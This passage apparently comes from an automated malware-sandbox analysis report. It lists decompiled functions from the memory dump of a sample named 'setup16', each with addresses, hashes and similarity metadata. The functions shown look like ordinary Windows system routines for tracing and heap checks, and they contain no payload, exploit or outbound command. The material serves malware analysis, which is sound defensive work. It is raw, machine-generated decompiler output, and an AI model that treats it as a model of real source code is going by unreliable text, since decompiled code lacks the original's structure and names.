                                                                                                                                                                                                        • Opcode ID: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
                                                                                                                                                                                                        • Instruction ID: cfec4e9e56036597fd2dbb399436c87655b77aa2335fb4ab1038333589551578
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 59F0FC332415229FE7725A5588C0F37B6AA9FC1A60F15053DF1099B344C960AC0296E7
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 049CB1E1 Relevance: .0, Instructions: 42COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E049CB1E1(intOrPtr __ecx, char __edx, char _a4, signed short* _a8) {
				signed char* _t13;
				intOrPtr _t22;
				char _t23;

				_t23 = __edx;
				_t22 = __ecx;
				if(E049E7D50() != 0) {
					_t13 = ( *[fs:0x30])[0x50] + 0x22a;
				} else {
					_t13 = 0x7ffe0384;
				}
				if( *_t13 != 0) {
					_t13 =  *[fs:0x30];
					if((_t13[0x240] & 0x00000004) == 0) {
						goto L3;
					}
					if(E049E7D50() == 0) {
						_t13 = 0x7ffe0385;
					} else {
						_t13 = ( *[fs:0x30])[0x50] + 0x22b;
					}
					if(( *_t13 & 0x00000020) == 0) {
						goto L3;
					}
					return E04A47016(0x14a4, _t22, _t23, _a4, _a8, 0);
				} else {
					L3:
					return _t13;
				}
			}






                                                                                                                                                                                                        0x049cb1e8
                                                                                                                                                                                                        0x049cb1ea
                                                                                                                                                                                                        0x049cb1f3
                                                                                                                                                                                                        0x04a24a17
                                                                                                                                                                                                        0x049cb1f9
                                                                                                                                                                                                        0x049cb1f9
                                                                                                                                                                                                        0x049cb1f9
                                                                                                                                                                                                        0x049cb201
                                                                                                                                                                                                        0x04a24a21
                                                                                                                                                                                                        0x04a24a2e
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a24a3b
                                                                                                                                                                                                        0x04a24a4d
                                                                                                                                                                                                        0x04a24a3d
                                                                                                                                                                                                        0x04a24a46
                                                                                                                                                                                                        0x04a24a46
                                                                                                                                                                                                        0x04a24a55
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049cb20a
                                                                                                                                                                                                        0x049cb20a
                                                                                                                                                                                                        0x049cb20a
                                                                                                                                                                                                        0x049cb20a

                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.370501493.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_49a0000_setup16.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                        • Opcode ID: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
                                                                                                                                                                                                        • Instruction ID: c81b252993855601c6e863e9da55863e7b97dc0838b45643271af0312314ecf5
                                                                                                                                                                                                        • Opcode Fuzzy Hash: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
                                                                                                                                                                                                        • Instruction Fuzzy Hash: A101D132200684EBE322975DE904F697BD9EF95754F4800B6F9148B6B1E679F840D316
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 04A5FE87 Relevance: .0, Instructions: 38COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 46%
                                                                                                                                                                                                        			E04A5FE87(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				signed int _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_v8 =  *0x4abd360 ^ _t35;
				_v16 = __ecx;
				_v54 = 0x1722;
				_v24 =  *(__ecx + 0x14) & 0x00ffffff;
				_v28 =  *((intOrPtr*)(__ecx + 4));
				_v20 =  *((intOrPtr*)(__ecx + 0xc));
				if(E049E7D50() == 0) {
					_t21 = 0x7ffe0382;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x228;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E04A0B640(E04A09AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}
















                                                                                                                                                                                                        0x04a5fe96
                                                                                                                                                                                                        0x04a5fe9e
                                                                                                                                                                                                        0x04a5fea1
                                                                                                                                                                                                        0x04a5fead
                                                                                                                                                                                                        0x04a5feb3
                                                                                                                                                                                                        0x04a5feb9
                                                                                                                                                                                                        0x04a5fec3
                                                                                                                                                                                                        0x04a5fed5
                                                                                                                                                                                                        0x04a5fec5
                                                                                                                                                                                                        0x04a5fece
                                                                                                                                                                                                        0x04a5fece
                                                                                                                                                                                                        0x04a5fee0
                                                                                                                                                                                                        0x04a5fee1
                                                                                                                                                                                                        0x04a5fee3
                                                                                                                                                                                                        0x04a5fee8
                                                                                                                                                                                                        0x04a5fefb

                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.370501493.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_49a0000_setup16.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                        • Opcode ID: 172fa78b88f863aa71215efadc3e87660a5ee79de09316ed1a07dce1a7614266
                                                                                                                                                                                                        • Instruction ID: e8c0e69b873966c996c158ac7abf8edd6f4d1a6869a3b4aa9c9ed40da4ea6bc7
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 172fa78b88f863aa71215efadc3e87660a5ee79de09316ed1a07dce1a7614266
                                                                                                                                                                                                        • Instruction Fuzzy Hash: B4018670A0020CEFCB14DFA8D542A6EB7F4FF04704F1441A9B904DB392E635E902CB90
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 04A8131B Relevance: .0, Instructions: 36COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 48%
                                                                                                                                                                                                        			E04A8131B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				short _v50;
				char _v56;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_v8 =  *0x4abd360 ^ _t32;
				_v20 = _a4;
				_v12 = _a8;
				_v24 = __ecx;
				_v16 = __edx;
				_v50 = 0x1021;
				if(E049E7D50() == 0) {
					_t18 = 0x7ffe0380;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				_push( &_v56);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E04A0B640(E04A09AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
			}















                                                                                                                                                                                                        0x04a8131b
                                                                                                                                                                                                        0x04a8132a
                                                                                                                                                                                                        0x04a81330
                                                                                                                                                                                                        0x04a81336
                                                                                                                                                                                                        0x04a8133e
                                                                                                                                                                                                        0x04a81341
                                                                                                                                                                                                        0x04a81344
                                                                                                                                                                                                        0x04a8134f
                                                                                                                                                                                                        0x04a81361
                                                                                                                                                                                                        0x04a81351
                                                                                                                                                                                                        0x04a8135a
                                                                                                                                                                                                        0x04a8135a
                                                                                                                                                                                                        0x04a8136c
                                                                                                                                                                                                        0x04a8136d
                                                                                                                                                                                                        0x04a8136f
                                                                                                                                                                                                        0x04a81374
                                                                                                                                                                                                        0x04a81387

                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.370501493.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_49a0000_setup16.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                        • Opcode ID: 1aaa36c7aa458bc8876d27c24b40de035614ef55d8c882ea765e7c1a31d0b704
                                                                                                                                                                                                        • Instruction ID: da18c6cb4b870e29ac84afc5bec6f0387d63612eb8173474021f0a4fc6c37edf
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1aaa36c7aa458bc8876d27c24b40de035614ef55d8c882ea765e7c1a31d0b704
                                                                                                                                                                                                        • Instruction Fuzzy Hash: A2013171A0120CAFDB44EFE9D545AAEB7F4FF48700F408069B945EB391E674EA01DB54
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 04A98F6A Relevance: .0, Instructions: 36COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 48%
                                                                                                                                                                                                        			E04A98F6A(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				short _v50;
				char _v56;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_v8 =  *0x4abd360 ^ _t32;
				_v16 = __ecx;
				_v50 = 0x1c2c;
				_v24 = _a4;
				_v20 = _a8;
				_v12 = __edx;
				if(E049E7D50() == 0) {
					_t18 = 0x7ffe0386;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v56);
				_push(0x10);
				_push(0x402);
				_push( *_t18 & 0x000000ff);
				return E04A0B640(E04A09AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
			}















                                                                                                                                                                                                        0x04a98f6a
                                                                                                                                                                                                        0x04a98f79
                                                                                                                                                                                                        0x04a98f81
                                                                                                                                                                                                        0x04a98f84
                                                                                                                                                                                                        0x04a98f8b
                                                                                                                                                                                                        0x04a98f91
                                                                                                                                                                                                        0x04a98f94
                                                                                                                                                                                                        0x04a98f9e
                                                                                                                                                                                                        0x04a98fb0
                                                                                                                                                                                                        0x04a98fa0
                                                                                                                                                                                                        0x04a98fa9
                                                                                                                                                                                                        0x04a98fa9
                                                                                                                                                                                                        0x04a98fbb
                                                                                                                                                                                                        0x04a98fbc
                                                                                                                                                                                                        0x04a98fbe
                                                                                                                                                                                                        0x04a98fc3
                                                                                                                                                                                                        0x04a98fd6

                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.370501493.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_49a0000_setup16.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                        • Opcode ID: 11a8975be0e24b458c4b3ce2da1e4774619330d9807b5692e0834573a589f4f1
                                                                                                                                                                                                        • Instruction ID: 6098ada3e24aa53ae4b2daee6a427b18de0fdc1ee3e409f26e5ec01cfa28e99f
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 11a8975be0e24b458c4b3ce2da1e4774619330d9807b5692e0834573a589f4f1
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4E014974A0020C9FDB00EFA9D545AAEB7F4EF48300F504059B905EB381E774EE00CB94
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 04A81608 Relevance: .0, Instructions: 34COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 46%
                                                                                                                                                                                                        			E04A81608(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				short _v46;
				char _v52;
				signed char* _t15;
				intOrPtr _t21;
				intOrPtr _t27;
				intOrPtr _t28;
				signed int _t29;

				_t26 = __edx;
				_v8 =  *0x4abd360 ^ _t29;
				_v12 = _a4;
				_v20 = __ecx;
				_v16 = __edx;
				_v46 = 0x1024;
				if(E049E7D50() == 0) {
					_t15 = 0x7ffe0380;
				} else {
					_t15 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				_push( &_v52);
				_push(0xc);
				_push(0x20402);
				_push( *_t15 & 0x000000ff);
				return E04A0B640(E04A09AE0(), _t21, _v8 ^ _t29, _t26, _t27, _t28);
			}














                                                                                                                                                                                                        0x04a81608
                                                                                                                                                                                                        0x04a81617
                                                                                                                                                                                                        0x04a8161d
                                                                                                                                                                                                        0x04a81625
                                                                                                                                                                                                        0x04a81628
                                                                                                                                                                                                        0x04a8162b
                                                                                                                                                                                                        0x04a81636
                                                                                                                                                                                                        0x04a81648
                                                                                                                                                                                                        0x04a81638
                                                                                                                                                                                                        0x04a81641
                                                                                                                                                                                                        0x04a81641
                                                                                                                                                                                                        0x04a81653
                                                                                                                                                                                                        0x04a81654
                                                                                                                                                                                                        0x04a81656
                                                                                                                                                                                                        0x04a8165b
                                                                                                                                                                                                        0x04a8166e

                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.370501493.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_49a0000_setup16.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                        • Opcode ID: afb44acb03e1de080dc2d769357addafe0d1455cbe9b34d320d0c5691f335121
                                                                                                                                                                                                        • Instruction ID: a590a01ba683f0d42c00444c8ce006be7691806abb76c1e211a0c69d027c5aa2
                                                                                                                                                                                                        • Opcode Fuzzy Hash: afb44acb03e1de080dc2d769357addafe0d1455cbe9b34d320d0c5691f335121
                                                                                                                                                                                                        • Instruction Fuzzy Hash: B5F06271E04248EFDB04EFE9D505AAEB7F4FF14300F4440A9A905EB391E634E901CB94
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 049EC577 Relevance: .0, Instructions: 33COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E049EC577(void* __ecx, char _a4) {
				void* __esi;
				void* __ebp;
				void* _t17;
				void* _t19;
				void* _t20;
				void* _t21;

				_t18 = __ecx;
				_t21 = __ecx;
				if(__ecx == 0 ||  *((char*)(__ecx + 0xdd)) != 0 || E049EC5D5(__ecx, _t19) == 0 ||  *((intOrPtr*)(__ecx + 4)) != 0x49a11cc ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					__eflags = _a4;
					if(__eflags != 0) {
						L10:
						E04A988F5(_t17, _t18, _t19, _t20, _t21, __eflags);
						L9:
						return 0;
					}
					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
					if(__eflags == 0) {
						goto L10;
					}
					goto L9;
				} else {
					return 1;
				}
			}









                                                                                                                                                                                                        0x049ec577
                                                                                                                                                                                                        0x049ec57d
                                                                                                                                                                                                        0x049ec581
                                                                                                                                                                                                        0x049ec5b5
                                                                                                                                                                                                        0x049ec5b9
                                                                                                                                                                                                        0x049ec5ce
                                                                                                                                                                                                        0x049ec5ce
                                                                                                                                                                                                        0x049ec5ca
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049ec5ca
                                                                                                                                                                                                        0x049ec5c4
                                                                                                                                                                                                        0x049ec5c8
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049ec5ad
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049ec5af

                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.370501493.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_49a0000_setup16.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                        • Opcode ID: 87a8a7ded32d712376be5d408eb2ee4aeeb90914b8f82e021d7da136ec567a5f
                                                                                                                                                                                                        • Instruction ID: 1224a738edbe1cb18f884f9560e1c8a4ae023ff3063049e6a566d9553047ec70
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 87a8a7ded32d712376be5d408eb2ee4aeeb90914b8f82e021d7da136ec567a5f
                                                                                                                                                                                                        • Instruction Fuzzy Hash: DEF090B2A1D6909EE7339B168044F327BDC9B05774F548876D49587101CEA4F880C251
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 04A82073 Relevance: .0, Instructions: 32COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 94%
                                                                                                                                                                                                        			E04A82073(void* __ebx, void* __ecx, void* __edi, void* __eflags) {
				void* __esi;
				signed char _t3;
				signed char _t7;
				void* _t19;

				_t17 = __ecx;
				_t3 = E04A7FD22(__ecx);
				_t19 =  *0x4ab849c - _t3; // 0x660d3c41
				if(_t19 == 0) {
					__eflags = _t17 -  *0x4ab8748; // 0x0
					if(__eflags <= 0) {
						E04A81C06();
						_t3 =  *((intOrPtr*)( *[fs:0x30] + 2));
						__eflags = _t3;
						if(_t3 != 0) {
							L5:
							__eflags =  *0x4ab8724 & 0x00000004;
							if(( *0x4ab8724 & 0x00000004) == 0) {
								asm("int3");
								return _t3;
							}
						} else {
							_t3 =  *0x7ffe02d4 & 0x00000003;
							__eflags = _t3 - 3;
							if(_t3 == 3) {
								goto L5;
							}
						}
					}
					return _t3;
				} else {
					_t7 =  *0x4ab8724; // 0x0
					return E04A78DF1(__ebx, 0xc0000374, 0x4ab5890, __edi, __ecx,  !_t7 >> 0x00000002 & 0x00000001,  !_t7 >> 0x00000002 & 0x00000001);
				}
			}







                                                                                                                                                                                                        0x04a82076
                                                                                                                                                                                                        0x04a82078
                                                                                                                                                                                                        0x04a8207d
                                                                                                                                                                                                        0x04a82083
                                                                                                                                                                                                        0x04a820a4
                                                                                                                                                                                                        0x04a820aa
                                                                                                                                                                                                        0x04a820ac
                                                                                                                                                                                                        0x04a820b7
                                                                                                                                                                                                        0x04a820ba
                                                                                                                                                                                                        0x04a820bc
                                                                                                                                                                                                        0x04a820c9
                                                                                                                                                                                                        0x04a820c9
                                                                                                                                                                                                        0x04a820d0
                                                                                                                                                                                                        0x04a820d2
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a820d2
                                                                                                                                                                                                        0x04a820be
                                                                                                                                                                                                        0x04a820c3
                                                                                                                                                                                                        0x04a820c5
                                                                                                                                                                                                        0x04a820c7
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a820c7
                                                                                                                                                                                                        0x04a820bc
                                                                                                                                                                                                        0x04a820d4
                                                                                                                                                                                                        0x04a82085
                                                                                                                                                                                                        0x04a82085
                                                                                                                                                                                                        0x04a820a3
                                                                                                                                                                                                        0x04a820a3

                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.370501493.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_49a0000_setup16.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                        • Opcode ID: a976e217013334d74ad0958f38a238de089536320f29d6afaa02f07b7f10a200
                                                                                                                                                                                                        • Instruction ID: e2a3d6220d69fac1b0486b2ae53716af3f4b3e72a0f8ea954bf940b33eb8f632
                                                                                                                                                                                                        • Opcode Fuzzy Hash: a976e217013334d74ad0958f38a238de089536320f29d6afaa02f07b7f10a200
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 19F0A0BB8151844AFF32BF2976013F22FA8D79611CB1954CDD89017202C53CAD83CAA4
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 04A98D34 Relevance: .0, Instructions: 32COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 43%
                                                                                                                                                                                                        			E04A98D34(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				short _v42;
				char _v48;
				signed char* _t12;
				intOrPtr _t18;
				intOrPtr _t24;
				intOrPtr _t25;
				signed int _t26;

				_t23 = __edx;
				_v8 =  *0x4abd360 ^ _t26;
				_v16 = __ecx;
				_v42 = 0x1c2b;
				_v12 = __edx;
				if(E049E7D50() == 0) {
					_t12 = 0x7ffe0386;
				} else {
					_t12 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v48);
				_push(8);
				_push(0x20402);
				_push( *_t12 & 0x000000ff);
				return E04A0B640(E04A09AE0(), _t18, _v8 ^ _t26, _t23, _t24, _t25);
			}













                                                                                                                                                                                                        0x04a98d34
                                                                                                                                                                                                        0x04a98d43
                                                                                                                                                                                                        0x04a98d4b
                                                                                                                                                                                                        0x04a98d4e
                                                                                                                                                                                                        0x04a98d52
                                                                                                                                                                                                        0x04a98d5c
                                                                                                                                                                                                        0x04a98d6e
                                                                                                                                                                                                        0x04a98d5e
                                                                                                                                                                                                        0x04a98d67
                                                                                                                                                                                                        0x04a98d67
                                                                                                                                                                                                        0x04a98d79
                                                                                                                                                                                                        0x04a98d7a
                                                                                                                                                                                                        0x04a98d7c
                                                                                                                                                                                                        0x04a98d81
                                                                                                                                                                                                        0x04a98d94

                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.370501493.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_49a0000_setup16.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                        • Opcode ID: 09fc6ffa9e3396605045384bc3578bc7332d556289efe6c49b639a64d169e79d
                                                                                                                                                                                                        • Instruction ID: 1224871d91ed3e2adecd4a9a251370a9158c85d76b05df843bb93de1cd00dda2
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 09fc6ffa9e3396605045384bc3578bc7332d556289efe6c49b639a64d169e79d
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 40F0B470E0460C9FDB04EFB8E541AAE77F4EF14300F5080A9E905EB291EA38ED00C754
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 04A0927A Relevance: .0, Instructions: 32COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 54%
                                                                                                                                                                                                        			E04A0927A(void* __ecx) {
				signed int _t11;
				void* _t14;

				_t11 = L049E4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x98);
				if(_t11 != 0) {
					E04A0FA60(_t11, 0, 0x98);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *(_t11 + 0x1c) =  *(_t11 + 0x1c) & 0x00000000;
					 *((intOrPtr*)(_t11 + 0x24)) = 1;
					E04A092C6(_t11, _t14);
				}
				return _t11;
			}





                                                                                                                                                                                                        0x04a09295
                                                                                                                                                                                                        0x04a09299
                                                                                                                                                                                                        0x04a0929f
                                                                                                                                                                                                        0x04a092aa
                                                                                                                                                                                                        0x04a092ad
                                                                                                                                                                                                        0x04a092ae
                                                                                                                                                                                                        0x04a092af
                                                                                                                                                                                                        0x04a092b0
                                                                                                                                                                                                        0x04a092b4
                                                                                                                                                                                                        0x04a092bb
                                                                                                                                                                                                        0x04a092bb
                                                                                                                                                                                                        0x04a092c5

                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.370501493.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_49a0000_setup16.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                        • Opcode ID: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
                                                                                                                                                                                                        • Instruction ID: 5dd882c4174fd7490ab667bad05491b5778f72300915196f67516e7a0eea1d0c
                                                                                                                                                                                                        • Opcode Fuzzy Hash: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
                                                                                                                                                                                                        • Instruction Fuzzy Hash: A1E09B723405406BE7219F56DC84F57775DDFC6725F048079B5045F283C6E5ED0987A4
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 04A98CD6 Relevance: .0, Instructions: 31COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 36%
                                                                                                                                                                                                        			E04A98CD6(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v12;
				short _v38;
				char _v44;
				signed char* _t11;
				intOrPtr _t17;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				signed int _t25;

				_v8 =  *0x4abd360 ^ _t25;
				_v12 = __ecx;
				_v38 = 0x1c2d;
				if(E049E7D50() == 0) {
					_t11 = 0x7ffe0386;
				} else {
					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v44);
				_push(0xffffffe4);
				_push(0x402);
				_push( *_t11 & 0x000000ff);
				return E04A0B640(E04A09AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
			}













                                                                                                                                                                                                        0x04a98ce5
                                                                                                                                                                                                        0x04a98ced
                                                                                                                                                                                                        0x04a98cf0
                                                                                                                                                                                                        0x04a98cfb
                                                                                                                                                                                                        0x04a98d0d
                                                                                                                                                                                                        0x04a98cfd
                                                                                                                                                                                                        0x04a98d06
                                                                                                                                                                                                        0x04a98d06
                                                                                                                                                                                                        0x04a98d18
                                                                                                                                                                                                        0x04a98d19
                                                                                                                                                                                                        0x04a98d1b
                                                                                                                                                                                                        0x04a98d20
                                                                                                                                                                                                        0x04a98d33

                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.370501493.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_49a0000_setup16.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                        • Opcode ID: 33b5fb120973bb554ba176fae8b2726a3155764ea0a3bd6d9a22ddf31d07a2de
                                                                                                                                                                                                        • Instruction ID: 0b96bd84f57843ffc2b9ec994e26fc2d591918f63e9316df371437782e31fc76
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 33b5fb120973bb554ba176fae8b2726a3155764ea0a3bd6d9a22ddf31d07a2de
                                                                                                                                                                                                        • Instruction Fuzzy Hash: DBF08270A04208AFDB04EBA9E945EAE77F8EF59304F5441A9E915EB2D1EA38ED00C754
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 049E746D Relevance: .0, Instructions: 31COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 88%
